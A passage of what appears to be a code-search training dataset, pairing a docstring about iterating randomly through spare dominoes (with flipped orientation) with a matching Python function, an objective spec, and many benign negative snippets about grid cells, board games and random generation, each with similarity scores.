[21-3, 24-3], [22-3, 25-3], [26-3, 42-3], [27-3, 41-3], [28-3, 40-3], [29-3, 39-3], [30-3, 38-3], \n [31-3, 37-3], [32-3, 36-3], [33-3, 35-3], [43-3, 52-3], [44-3, 51-3], [45-3, 50-3], [46-3, 49-3], [47-3, 48-3], \n [62-3, 71-3], [63-3, 70-3], [64-3, 69-3], [65-3, 68-3], [66-3, 73-3], [67-3, 72-3], [57-3, 61-3], [58-3, 60-3],\n [74-3, 80-3], [75-3, 79-3], [76-3, 78-3], [87-3, 89-3], [93-3, 91-3], [86-3, 90-3], [85-3, 81-3], [84-3, 82-3],\n [94-3, 115-3], [95-3, 116-3], [96-3, 117-3], [97-3, 118-3], [98-3, 119-3], [99-3, 120-3], [100-3, 121-3],\n [101-3, 122-3], [102-3, 123-3], [103-3, 124-3], [104-3, 125-3], [105-3, 126-3], [106-3, 127-3], [107-3, 128-3],\n [108-3, 129-3], [109-3, 130-3], [110-3, 131-3], [111-3, 132-3], [112-3, 133-3], [113-3, 134-3], [114-3, 135-3]]", "def test_two_cell_repel():\n space = c6.Space()\n c6.Cell(space, [0, 0], 1)\n c6.Cell(space, [0, 1.9], 1)\n for i in range(2):\n space.step()", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def add_char(self, coord, char, modify=False):\n if modify:\n range_y, range_x = self._map_dims\n new_coord = [coord[0]+range_y[0]-1, coord[1]+range_x[0]-1]\n self._screen.addch(new_coord[0], new_coord[1], char)\n self._screen.refresh()\n return new_coord\n else:\n self._screen.addch(coord[0], coord[1], char)\n self._screen.refresh()\n return coord", "def interact(self,cell1,cell2):\n difference = math.fabs(cell1-cell2)\n if difference<=self.t: #if both cells are close enough: \n if cell1>cell2:\n # print \"Case 1\"\n return (cell1-difference/2.0,cell2+difference/2.0)\n else:\n # print \"Case 2\"\n return (cell1+difference/2.0,cell2-difference/2.0)\n else: #cells too far apart, they radicalize\n if cell1>cell2:\n # print \"Case 3\"\n return (cell1+(1-cell1)/2.0,cell2/2.0) #the higher one moves toward 1, the lower one moves toward 0\n else:\n # print \"Case 4\"\n return (cell1/2.0,cell2+(1-cell2)/2.0)", "def __createkey__(self):\n return str(self.currentCol) + \",\" + str(self.currentRow)", "def getCellStr(self, x, y): # TODO: refactor regarding issue #11\n c = self.board.getCell(x, y)\n\n if c == 0:\n return '.' if self.__azmode else ' .'\n\n elif self.__azmode:\n az = {}\n for i in range(1, int(math.log(self.board.goal(), 2))):\n az[2 ** i] = chr(i + 96)\n\n if c not in az:\n return '?'\n s = az[c]\n elif c == 1024:\n s = ' 1k'\n elif c == 2048:\n s = ' 2k'\n else:\n s = '%3d' % c\n\n return self.__colors.get(c, Fore.RESET) + s + Style.RESET_ALL", "def teleport_pair(cell, game_coords):\n # get cell display\n item = search_coords(game_coords, cell)\n\n if item in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n for coords in game_coords[item]:\n # partner pad found\n if coords != cell:\n return coords\n\n # not a teleport pad\n return -1" ]
[ "0.6033239", "0.5642616", "0.5578127", "0.5315496", "0.52856386", "0.5230224", "0.5207506", "0.51857436", "0.51733494", "0.5166131", "0.51407605", "0.5093636", "0.5047172", "0.50447404", "0.50364846", "0.50296426", "0.5018322", "0.499095", "0.49901915", "0.49538672", "0.49527854", "0.49503666", "0.49114814", "0.49036044", "0.49035886", "0.49032792", "0.4896659", "0.48891604", "0.48668414", "0.48373324" ]
0.5760053
1
Split all dominoes into separate cells. Useful for Dominosa.
def split_all(self): for domino in self.dominoes[:]: self.split(domino)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_split_cell_splits_neighbours(mock_amg):\n\n # split the centre cell in the mock grid\n # this will create 4 more cells at tier 1\n mock_amg.cells[4].split()\n\n # now split the bottom right of these cells\n # this should force the east and south cells to also be split\n mock_amg.cells[4].children['br'].split()\n\n assert mock_amg.cells[5].has_children\n assert mock_amg.cells[1].has_children", "def test_split_adds_children(mock_amg):\n\n mock_amg.cells[0].split()\n assert mock_amg.cells[0].children['bl'] is mock_amg.cells[-4]\n assert mock_amg.cells[0].children['br'] is mock_amg.cells[-3]\n assert mock_amg.cells[0].children['tl'] is mock_amg.cells[-2]\n assert mock_amg.cells[0].children['tr'] is mock_amg.cells[-1]", "def pushDominoes(self, dominoes: str) -> str:\n\n N = len(dominoes)\n dist_R = [-1] * N\n dist_L = [-1] * N\n\n count = -1\n for i in range(N):\n if dominoes[i] == 'R':\n count = 0\n elif dominoes[i] == 'L':\n count = -1\n elif count >= 0:\n count += 1\n dist_R[i] = count if count >= 0 else 2 * N\n\n count = -1\n for i in reversed(range(N)):\n if dominoes[i] == 'L':\n count = 0\n elif dominoes[i] == 'R':\n count = -1\n elif count >= 0:\n count += 1\n dist_L[i] = count if count >= 0 else 2 * N\n\n # print(dist_R)\n # print(dist_L)\n\n out = [\".\"] * N\n for i in range(N):\n if dist_R[i] < dist_L[i]:\n out[i] = \"R\"\n elif dist_R[i] > dist_L[i]:\n out[i] = \"L\"\n return \"\".join(out)", "def all_cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.circle_star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n part = Partition(list(self))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def get_cells(self):\n return [\n cell for column in self.children for cell in column.get_cells()]", "def get_numbered_cells_adjacent_closed_cells(self):\r\n numbered_cells_adjacent_closed_cells = []\r\n numbered_cells = self.get_all_numbered_cells()\r\n for row, col in numbered_cells:\r\n _, closed_cells, _, _ = self.get_cells(row, col)\r\n if closed_cells:\r\n numbered_cells_adjacent_closed_cells.append((row, col))\r\n return numbered_cells_adjacent_closed_cells", "def delete_cells(self):\n cells_dict_base, cell_list_act, common_cells = self.cells_list()\n while(len(common_cells) != 0):\n cell_index = cells_dict_base[common_cells[0]]['index']\n if cell_index != len(cells_dict_base)-1:\n cell_start = cells_dict_base[common_cells[0]]['start']\n next_cell_start = [values['start'] for cell_name, values in cells_dict_base.items() if values['index'] == (cell_index+1)][0]\n cell_content = self.base_doc[cell_start: next_cell_start]\n self.base_doc = self.base_doc.replace(cell_content, '')\n else:\n cell_start = cells_dict_base[common_cells[0]]['start']\n cell_content = self.base_doc[cell_start:]\n self.base_doc = self.base_doc.replace(cell_content, '')\n self.removed_last_bracket = True\n cells_dict_base, cell_list_act, common_cells = self.cells_list()", "def bosonic_cells(self):\n cells = self.cells()\n fermionic_cells = self.fermionic_cells()\n coords = [x for x in cells if x not in fermionic_cells]\n return coords", "def to_cdo_grid(self, outfile):", "def simple_solution(self, dominoes: str) -> str:\n dominoes = list(dominoes)\n nodes = [(-1, 'L')] + [(i, x) for i, x in enumerate(dominoes) if x != '.'] + [\n (len(dominoes), 'R')]\n for (i, x), (j, y) in zip(nodes, nodes[1:]):\n if x == y:\n for k in range(i + 1, j):\n dominoes[k] = x\n elif x == 'R' and y == 'L':\n k, l = i, j\n while k < l:\n dominoes[k] = x\n dominoes[l] = y\n k, l = k + 1, l - 1\n if ((j - i + 1) % 2) != 0:\n dominoes[(j + i) // 2] = '.'\n return ''.join(dominoes)", "def _init_pagoda_clses(self):\n a = []; b = [] #IGNORE:C0321\n c = []; d = [] #IGNORE:C0321\n row_selector = ((a, b), (c, d))\n for cell in self.compact:\n row_selector[cell.y % 2][cell.x % 2].append(cell)\n cell.pvalue = cell.y % 2 + 1 + cell.x % 2 \n return a, b, c, d", "def partition_domain(self, dom):\r\n split = len(dom) // 2\r\n dom1 = set(list(dom)[0:split])\r\n dom2 = dom - dom1\r\n return dom1, dom2", "def _cells(notebook):\n if notebook.nbformat < 4:\n for ws in notebook.worksheets:\n for cell in ws.cells:\n yield cell\n else:\n for cell in notebook.cells:\n yield cell", "def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result", "def test_split_cell_east_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[5].split() # east cell\n\n east = mock_amg.cells[5]\n west = mock_amg.cells[4]\n\n assert west.children['tr'].east == east.children['tl']\n assert west.children['br'].east == east.children['bl']\n assert east.children['tl'].west == west.children['tr']\n assert east.children['bl'].west == west.children['br']", "def test_split_cell_creates_four_more_cells(mock_amg):\n\n init_n_windows = mock_amg.n_windows\n init_n_cells = mock_amg.n_cells\n\n mock_amg.cells[0].split()\n\n assert init_n_windows + 5 == mock_amg.n_windows\n assert init_n_cells + 4 == mock_amg.n_cells", "def pushDominoes(self, dominoes: str) -> str:\n return self.simple_solution(dominoes)", "def split(self, dim, bins):\n if type(bins) in (int, complex):\n bins = np.r_[self.min(dim):self.max(dim):bins]\n p = self.get_cols(dim)[0]\n idx = np.digitize(p, bins)\n splitted = []\n for i in xrange(1,len(bins)):\n new_data = self.data[idx==i]\n splitted.append(DataTable(\n new_data,\n self.dims,\n self.legends,\n self.tags,\n self.sub_name('%.2f<=%s<%.2f' % (bins[i-1], dim, bins[i]))))\n return splitted", "def _generate_cells(self) -> None:\n for i in range(15):\n for j in range(15):\n c = Cell(x=i, y=j)\n c.answer = self.puzzle.solution[j*self.width+i]\n self.cells[(j, i)] = c # row, col", "def test_split_cell_south_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[1].split() # south cell\n\n south = mock_amg.cells[1]\n north = mock_amg.cells[4]\n\n assert south.children['tl'].north == north.children['bl']\n assert south.children['tr'].north == north.children['br']\n assert north.children['bl'].south == south.children['tl']\n assert north.children['br'].south == south.children['tr']", "def merge_cells(self):\n\n for rownum, row in enumerate(self.cells):\n for colnum, cell in enumerate(row):\n if not isinstance(cell, Cell):\n continue\n cols_to_merge = 0\n for i in range(colnum+1, len(row)):\n if isinstance(self.cells[rownum][i], Cell) and self.cells[rownum][i].event == cell.event:\n cols_to_merge += 1\n if cols_to_merge > 0:\n cell.colspan = cols_to_merge + 1\n for i in range(1, cols_to_merge + 1):\n self.cells[rownum][colnum + i] = SpanCell(rownum, colnum + i)", "def cells_list(self):\n xx, yy = np.meshgrid(self.x_spacings, self.y_spacings)\n return np.vstack([yy.ravel(), xx.ravel()]).transpose()", "def test_split_adds_known_neighbours(mock_amg):\n\n mock_amg.cells[4].split()\n # bl\n assert mock_amg.cells[-4].north is mock_amg.cells[-2]\n assert mock_amg.cells[-4].east is mock_amg.cells[-3]\n\n # br\n assert mock_amg.cells[-3].north is mock_amg.cells[-1]\n assert mock_amg.cells[-3].west is mock_amg.cells[-4]\n\n # tl\n assert mock_amg.cells[-2].south is mock_amg.cells[-4]\n assert mock_amg.cells[-2].east is mock_amg.cells[-1]\n\n # tr\n assert mock_amg.cells[-1].south is mock_amg.cells[-3]\n assert mock_amg.cells[-1].west is mock_amg.cells[-2]", "def fill_cells(self, latitudes, longitudes, businesses):\n if len(businesses) == 0:\n # There are no businesses in this area\n return\n if longitudes.size > 2:\n # First we devide the collection along the center of longitudes\n center = longitudes[longitudes.size / 2]\n fill_cells(self, latitudes,\n longitudes[:(longitudes.size / 2 + 1)],\n businesses[businesses.longitude <= center])\n fill_cells(self, latitudes, longitudes[(longitudes.size / 2):],\n businesses[businesses.longitude > center])\n elif latitudes.size > 2:\n # Now we devide along the center of latitudes\n center = latitudes[latitudes.size / 2]\n fill_cells(self, latitudes[:(latitudes.size / 2 + 1)],\n longitudes,\n businesses[businesses.latitude <= center])\n fill_cells(self, latitudes[(latitudes.size / 2):], longitudes,\n businesses[businesses.latitude > center])\n else:\n # Now we are in one Cell! Let's store our businesses\n bizs = []\n for idx, business in businesses.iterrows():\n # For performance, we only store index and coordinates\n bizs.append({'index': idx,\n 'latitude': business.latitude,\n 'longitude': business.longitude})\n coord = (self.longitudes.searchsorted(longitudes[0]),\n self.latitudes.searchsorted(latitudes[0]))\n if coord[0] not in self.cells:\n self.cells[coord[0]] = {}\n self.cells[coord[0]].update({coord[1]: bizs})", "def visit_table(self, sytable):\n def index(sytable):\n try:\n return sytable.get_column(self.input_index)\n except:\n return np.arange(sytable.number_of_rows())\n\n def slices_using_group_array(group_array):\n \"\"\"Return the slices to split by.\n A group array is made of strictly increasing group identifiers.\n\n >>> slices_using_group_array(np.array([0, 0, 0, 1, 1, 2, 3, 3, 3]))\n [(0, 3), (3, 5), (5, 6), (6, 9)]\n \"\"\"\n unique_elements = np.unique(group_array)\n slices = []\n for unique_element in unique_elements:\n indexes = np.flatnonzero(group_array == unique_element)\n low, high = (indexes[0], indexes[-1] + 1)\n slices.append((unique_element, slice(low, high)))\n return slices\n\n def indices_using_group_array(group_array):\n \"\"\"\n Return list of index lists, ordered by first occurance of value.\n \"\"\"\n unique_elements = np.unique(group_array)\n indices = []\n for unique_element in unique_elements:\n indices.append((unique_element,\n np.flatnonzero(group_array == unique_element)))\n return indices\n\n columns = sytable.columns()\n # Perform the split and append the new tables to output.\n slice_indices = indices_using_group_array(index(sytable))\n column_attrs = {}\n\n for unique_element, slice_index in slice_indices:\n # Sets of all columns except for the INDEX columns.\n result = type(sytable)(sytable.container_type)\n self.output_list.append((unique_element, result))\n\n for column in columns:\n array = sytable.get_column(column)[slice_index]\n if self.remove_fill and len(array):\n kind = array.dtype.kind\n if kind in ['S', 'U']:\n if np.all(array == ''):\n continue\n else:\n if not len(array) or np.isnan(np.min(array)):\n continue\n\n result.set_column(column, array)\n if column in column_attrs:\n attrs = column_attrs[column]\n else:\n attrs = dict(\n sytable.get_column_attributes(column).get())\n column_attrs[column] = attrs\n result.get_column_attributes(column).set(attrs)", "def choose_extra_dominoes(self, random):\n dominoes = self.extra_dominoes[:]\n count = len(dominoes)\n start = random.randrange(count)\n for i in range(count):\n yield dominoes[(i + start) % count]", "def test_split_cell_west_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[3].split() # west cell\n\n west = mock_amg.cells[3]\n east = mock_amg.cells[4]\n\n assert west.children['tr'].east == east.children['tl']\n assert west.children['br'].east == east.children['bl']\n assert east.children['tl'].west == west.children['tr']\n assert east.children['bl'].west == west.children['br']", "def split_into_codons(dna):\n dna_split = []\n length = math.ceil(len(dna)/3)\n for i in range(0, length):\n j = 3*i\n codon = dna[j:j+3]\n dna_split += [codon]\n return dna_split" ]
[ "0.54147345", "0.53187776", "0.5316432", "0.53141034", "0.50757587", "0.50472033", "0.5007801", "0.49147692", "0.49121788", "0.4892322", "0.48909703", "0.48512492", "0.48459086", "0.48424825", "0.48366407", "0.48032853", "0.47910866", "0.47892538", "0.47808278", "0.47771978", "0.47716329", "0.4771325", "0.47523955", "0.47449994", "0.47403342", "0.47374755", "0.47298428", "0.4729653", "0.4727065", "0.4720182" ]
0.7638271
0
Iterate through self.extra_dominoes, start at random position. a generator of dominoes.
def choose_extra_dominoes(self, random): dominoes = self.extra_dominoes[:] count = len(dominoes) start = random.randrange(count) for i in range(count): yield dominoes[(i + start) % count]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_and_flip_extra_dominoes(self, random):\n for domino in self.choose_extra_dominoes(random):\n if domino.head.pips == domino.tail.pips:\n yield domino, False\n else:\n flip_first = random.randint(0, 1)\n for j in range(2):\n yield domino, flip_first + j == 1", "def pickup_dominoes(self, num_dominoes, player):\n\n for domino in range(num_dominoes):\n shuffle(self.boneyard)\n player.hand.append(self.boneyard.pop(0))", "def derandomize(self, xs, noises):\n raise NotImplementedError", "def _all_donors(self, include_background=True):\n sheets = self.shortcut_sheets\n if not include_background:\n sheets = filter(is_not_background, sheets)\n for sheet in sheets:\n for entity in sheet.bio_entities.values():\n yield entity", "def __dice_generator(self):\n self.current_dice = np.random.randint(1, 6 + 1)", "def get_seeds(self, start: float, num: int) -> np.ndarray:\r\n\r\n if self.integral:\r\n if self.domain[1] - self.domain[0] + 1 <= num:\r\n return np.arange(self.domain[0], self.domain[1] + 1)\r\n result = np.random.choice(\r\n np.arange(self.domain[0], self.domain[1] + 1), num, replace=False)\r\n if start not in result:\r\n result[0] = start\r\n return result\r\n\r\n\r\n result = np.zeros((num,), dtype='float64')\r\n result[0] = start\r\n min_sep = (self.domain[1] - self.domain[0]) * min(0.05, 0.25 / num)\r\n\r\n for i in range(1, num):\r\n rejections = 0\r\n while True:\r\n _pt = np.random.uniform(self.domain[0], self.domain[1], 1)\r\n if sdist.cdist(_pt.reshape(1, 1), result[:i].reshape(i, 1)).min() < min_sep:\r\n rejections += 1\r\n if rejections > 50000:\r\n raise ValueError(\r\n f'failed to sample! domain might be singleton: {self.domain}')\r\n else:\r\n result[i] = _pt\r\n break\r\n\r\n return result", "def generate_random_walker():\n # must have seeds that generate known problems\n must_have_seeds = [112, 308, 393]\n for seed in must_have_seeds:\n print(\"Last used seed: {}\".format(seed))\n detections = detections_simple_tracking(seed)\n yield simple_walker(data_simple_tracking(detections)), detections\n while True:\n seed = random.randint(0, 2**10)\n print(\"Last used seed: {}\".format(seed))\n detections = detections_simple_tracking(seed)\n yield simple_walker(data_simple_tracking(detections)), detections", "def iter_dist(self):\n self.makeTree()\n coords = self.coords\n sd = selfdistance\n for i in self.loopindices:\n dists, inds = self.nntree.query(coords[i], self.nnmaxcount,\n distance_upper_bound=self.nncutoff)\n yield coords[i], dists.compress((dists > sd) & ~np.isinf(dists))", "def get_examples():\n symbols = get_symbols()\n symbol_start_indices, total_examples = _index_symbols(symbols)\n selection_order = np.arange(total_examples)\n np.random.shuffle(selection_order)\n for sample_index in selection_order:\n # use a binary search to determine which symbol to use given the sample_index\n start_index_index = bisect.bisect_left(symbol_start_indices, sample_index + 1) - 1\n start_index = symbol_start_indices[start_index_index]\n offset = sample_index - start_index\n symbol = symbols[start_index_index]\n time_series_data = get_time_series_data(symbol)\n next_day = time_series_data[offset]\n previous_days = time_series_data[offset + 1: offset + 1 + EXAMPLE_SIZE]\n previous_days.reverse()\n metadata = get_metadata_for_symbol(symbol)\n yield previous_days, next_day, metadata", "def split_all(self):\n for domino in self.dominoes[:]:\n self.split(domino)", "def nextGen(self):\n\n p = []\n while len(p) < len(self.p):\n #select mates and produce offspring\n p1, p2 = self.select()\n offspring = self.mate(p1, p2)\n\n #put the offspring in the next generation (with mutation)\n for child in offspring:\n child=self.mutate(child)\n p.append(child)\n \n\n # the world belongs to the new generation\n return p", "def getRandomCoordinates( self, size ):\n if not self.mIsLoaded: self.__loadIndex()\n\n token = random.choice( self.mIndex.keys() ) \n strand = random.choice( (\"+\", \"-\") )\n pos_id, pos_seq, lcontig = self.mIndex[token][:3]\n rpos = random.randint( 0, lcontig )\n if random.choice( (\"True\", \"False\") ):\n start = rpos\n end = min(rpos + size, lcontig)\n else:\n start = max(0, rpos - size)\n end = rpos\n \n return token, strand, start, end", "def insere_n_nos(self, num_nos):\n for i in range(num_nos):\n index = random.randint(1, 11 ** 4)\n elem = random.randint(1, 11 ** 4)\n self.insere(index, elem)", "def create_next_gen(self, parents_sreprs_couple):\n child0, child1 = self.recombine(parents_sreprs_couple[0], parents_sreprs_couple[1])\n if random.random() < self.mutate_prob:\n child0 = self.mutate(child0)\n if random.random() < self.mutate_prob:\n child1 = self.mutate(child1)\n\n return child0, child1", "def generate_random_tomogram_set(templates, criteria, number_of_tomograms, dim, seed=None, noise=False):\n if (seed == None):\n seed = random.randint(0, 2 ** 31 - 1)\n print('Using random seed: ', seed)\n random.seed(int(seed))\n np.random.seed(int(seed))\n\n for i in range(number_of_tomograms):\n yield generate_random_tomogram(templates, criteria, dim, noise)", "def play_dominoes(draw=draw_init, save_file=None, num_games=1000, save=True):\n list_victories = [0]*(NUM_PLAYERS+1)\n game = Dominoes(NUM_PLAYERS, HAND_SIZE, TOPNUM, save_file=save_file)\n \n # Setups the game. This includes initializing the player instances.\n player1 = RandomDominoPlayer(1, game)\n player2 = RandomDominoPlayer(2, game)\n player3 = RandomDominoPlayer(3, game)\n player4 = RandomDominoPlayer(4, game)\n list_players = (player1, player2, player3, player4)\n game.setup(list_players)\n\n # Play!\n for i in range(num_games):\n # Cleans the game state\n game.reset()\n \n # Draws the starting dominoes.\n starting_dominoes = draw(NUM_PLAYERS, DOMINO, HAND_SIZE)\n# print('\\nStarting_dominoes')\n# print(starting_dominoes[0])\n# print(starting_dominoes[1])\n# print(starting_dominoes[2])\n# print(starting_dominoes[3])\n \n # Assigns the starting dominoes to each player\n for player, dominoes in zip(list_players, starting_dominoes):\n player.reset(start_dominoes=list(dominoes))\n \n # Rolls the game!\n winner = roll_game(game, save=save)\n list_victories[winner] += 1\n if (i*20) % num_games == 0:\n print(i*100/num_games, '% processed.')\n \n# print('Salida:', game.salida)\n \n print('\\n', list_victories, '\\t', list_victories[1]+list_victories[3], \n list_victories[2]+list_victories[4])", "def random_iterator(self, batch_size):\n all_indices = np.nonzero(np.logical_not(self._dones))[0]\n np.random.shuffle(all_indices)\n\n states = np.asarray(self._states)\n actions = np.asarray(self._actions)\n next_states = np.asarray(self._next_states)\n rewards = np.asarray(self._rewards)\n dones = np.asarray(self._dones)\n\n i = 0\n while i < len(all_indices):\n indices = all_indices[i:i+batch_size]\n\n yield states[indices], actions[indices], next_states[indices], rewards[indices], dones[indices]\n\n i += batch_size", "def _build_genotypes(self):\n x = np.zeros(self.n)\n \n # Frequencies derived from HWE.\n num_hetero = 2 * self.maf * (1 - self.maf) * self.n\n num_homo_minor = self.maf ** 2 * self.n\n \n x[:num_hetero] = 1\n x[num_hetero:num_hetero+num_homo_minor] = 2\n np.random.shuffle(x)\n \n # Add noise for dosage values if needed.\n if self.dosage_var:\n x[x == 0] += np.abs(\n np.random.normal(0, self.dosage_var, len(x[x == 0]))\n )\n x[x == 1] += np.random.normal(0, self.dosage_var, len(x[x == 1]))\n x[x == 2] -= np.abs(\n np.random.normal(0, self.dosage_var, len(x[x == 2]))\n )\n\n # Mask some values if the call rate is not 1.\n if self.call_rate < 1:\n missing_rate = 1 - self.call_rate\n missing_number = missing_rate * self.n\n missing_idx = np.arange(0, self.n)\n np.random.shuffle(missing_idx)\n missing_idx = missing_idx[:missing_number]\n x[missing_idx] = np.nan\n \n return x", "def _iterate_domains(self):\n\n class DomainIter:\n # Indices refer to positions between the nucleotides, as usual for \n # slices in python.\n\n def __init__(self, domain, cursor, rel_start, rel_end):\n self.domain = domain\n self.start = cursor\n self.rel_start = rel_start\n self.rel_end = rel_end\n\n def __repr__(self):\n return ('DomainIter('\n 'domain={0.domain!r}, '\n 'start={0.start}, '\n 'rel_start={0.rel_start}, '\n 'rel_end={0.rel_end})'.format(self))\n @property\n def len(self):\n return self.rel_end - self.rel_start\n\n @property\n def end(self):\n return self.start + self.len\n\n def rel_index(self, index):\n return index - self.start + self.rel_start\n\n def abs_index(self, rel_index):\n return self.start + rel_index - self.rel_start\n\n domain_cursor = 0\n index_cursor = 0\n \n while domain_cursor < len(self._domains):\n domain = self._domains[domain_cursor]\n\n # If this domain doesn't have anything attached to it, then we can \n # just yield the whole thing right away.\n\n if domain not in self._attachments:\n yield DomainIter(domain, index_cursor, 0, len(domain))\n index_cursor += len(domain)\n\n # If this domain does have something attached to it, then we need \n # to carefully yield only the parts of it that aren't covered by \n # the attachment.\n\n else:\n attachment = self._attachments[domain]\n\n # Yield whatever fraction of this domain comes before the \n # attachment.\n\n yield DomainIter(domain,\n index_cursor, 0, attachment.start_index)\n index_cursor += attachment.start_index\n\n # Yield the domains in the attachment itself by recursively \n # calling this method.\n\n for domain_iter in attachment.construct._iterate_domains():\n domain_iter.start += index_cursor\n yield domain_iter\n index_cursor += len(attachment.construct)\n\n # Skip domains until we reach the one where the attachment \n # ends.\n\n while domain is not attachment.end_domain:\n domain_cursor += 1\n domain = self._domains[domain_cursor]\n\n # Yield whatever fraction of that domain comes after the \n # attachment.\n\n yield DomainIter(domain,\n index_cursor, attachment.end_index, len(domain))\n index_cursor += len(domain) - attachment.end_index\n\n domain_cursor += 1", "def mutate_random(self, n=1):\n mutated_dna = self._dna\n for i in range(n):\n mutated_dna = mutate(mutated_dna)\n return Gene(mutated_dna, self._exon_regions)", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def generate_dimino(self, af=False):\n idn = list(range(self.degree))\n order = 0\n element_list = [idn]\n set_element_list = {tuple(idn)}\n if af:\n yield idn\n else:\n yield _af_new(idn)\n gens = [p._array_form for p in self.generators]\n\n for i in range(len(gens)):\n # D elements of the subgroup G_i generated by gens[:i]\n D = element_list[:]\n N = [idn]\n while N:\n A = N\n N = []\n for a in A:\n for g in gens[:i + 1]:\n ag = _af_rmul(a, g)\n if tuple(ag) not in set_element_list:\n # produce G_i*g\n for d in D:\n order += 1\n ap = _af_rmul(d, ag)\n if af:\n yield ap\n else:\n p = _af_new(ap)\n yield p\n element_list.append(ap)\n set_element_list.add(tuple(ap))\n N.append(ap)\n self._order = len(element_list)", "def generate_examples_serial(self):\n # Now we have a Gensim Dictionary to work with\n self._build_dictionary()\n # Remove any tokens with a frequency less than 10\n self.dictionary.filter_extremes(no_below=10, no_above=0.75)\n\n self.examples = []\n for file in tqdm(self.load_files(), desc=\"Generating Examples (serial)\"):\n file = self.dictionary.doc2idx(file)\n self.examples.extend(self._generate_examples_from_file(file))", "def __iter__(self) -> Generator:\n\t\treturn (article for article in self._articles)", "def random_population():\n pop = []\n for i in range(POP_SIZE):\n dna = \"\"\n for c in range(DNA_SIZE):\n dna += random_char()\n pop.append(dna)\n return pop", "def _generate_pores(self):\n logger.info(\"Place randomly located pores in the domain\")\n #Original Random Point Generator\n #coords = sp.rand(self._Np,3)*[self._Lx,self._Ly,self._Lz]\n #Seeding Code\n coords = np.zeros([self._Np,3])\n #reject points close to boundaries - if False there will be slightly more\n rejection = [False,False,True]\n for j in range(3):\n i = 0\n while i < self._Np:\n coord = np.random.uniform(0,1,1)\n if self._reject(coord) == rejection[j]:\n coords[i][j]=coord\n i += 1\n coords*=np.array([self._Lx,self._Ly,self._Lz])\n #Seeding Code\n #Uniform Random Generator\n #coords = np.array([np.random.uniform(0,self._Lx,self._Np),np.random.uniform(0,self._Ly,self._Np),np.random.uniform(0,self._Lz,self._Np)]).T\n\n self['pore.coords'] = coords\n logger.debug(\"End of method\")", "def generate_moves(self, board: Board) -> typing.Iterator[MoveDescription]:\n dominoes = set(board.dominoes)\n for domino in dominoes:\n dx, dy = domino.direction\n yield from self.try_move(domino, dx, dy)\n yield from self.try_move(domino, -dx, -dy)", "def generate_units(self, num_soldados, num_magos):\n self.soldados = [soldier(randrange(*self.race.rango_atq_soldado),\n randrange(*self.race.rango_vid_soldado))\n for i in range(num_soldados)]\n\n self.magos = [mage(randrange(*self.race.rango_atq_mago),\n randrange(*self.race.rango_vid_mago))\n for i in range(num_magos)]\n\n self._initial_life_set = False", "def sequence(self):\n for tn in self._testnodes:\n yield tn", "def newGeneration(self):\n for i in range(0, len(self.population)):\n [ind1, ind2] = self.randomSelection()\n child = self.crossover(ind1, ind2)\n self.population[i].setGene(child)\n self.mutation(self.population[i])" ]
[ "0.6895019", "0.62940025", "0.5725973", "0.53913283", "0.51478684", "0.5122216", "0.5106027", "0.51026565", "0.5055542", "0.50077224", "0.49957895", "0.4972248", "0.49301994", "0.49140477", "0.49055457", "0.48926997", "0.4876082", "0.48698455", "0.48647448", "0.48630825", "0.48471773", "0.48347035", "0.47879037", "0.4787243", "0.47839093", "0.47767895", "0.47700804", "0.4763562", "0.47510606", "0.47437888" ]
0.8736248
0
Iterate through self.extra_dominoes, start at random position. a generator of (domino, is_flipped) pairs. Each domino is returned twice, with True or False in random order.
def choose_and_flip_extra_dominoes(self, random): for domino in self.choose_extra_dominoes(random): if domino.head.pips == domino.tail.pips: yield domino, False else: flip_first = random.randint(0, 1) for j in range(2): yield domino, flip_first + j == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_extra_dominoes(self, random):\n dominoes = self.extra_dominoes[:]\n count = len(dominoes)\n start = random.randrange(count)\n for i in range(count):\n yield dominoes[(i + start) % count]", "def pickup_dominoes(self, num_dominoes, player):\n\n for domino in range(num_dominoes):\n shuffle(self.boneyard)\n player.hand.append(self.boneyard.pop(0))", "def derandomize(self, xs, noises):\n raise NotImplementedError", "def adjacent_octile(randomize=False):\n moves = [\n Point(0, 1),\n Point(1, 0),\n Point(0, -1),\n Point(-1, 0),\n Point(1, 1),\n Point(1, -1),\n Point(-1, 1),\n Point(-1, -1)\n ]\n\n if randomize:\n return random.shuffle(moves)\n else:\n return moves", "def generate_spin_flips(self, n_flips):\n first_flip_site = self._pick_site()\n first_flip_value = self.current_state[first_flip_site]\n\n if n_flips == 2:\n next_flip_site = self._pick_site()\n next_flip_value = self.current_state[next_flip_site]\n if self.zero_magnetization:\n if first_flip_value == next_flip_value:\n return []\n else:\n return [first_flip_site, next_flip_site]\n else:\n if first_flip_site == next_flip_site:\n return []\n else:\n return [first_flip_site, next_flip_site]\n else:\n return [first_flip_site]", "def in_random_order(theta):\r\n indexes = [i for i,_ in 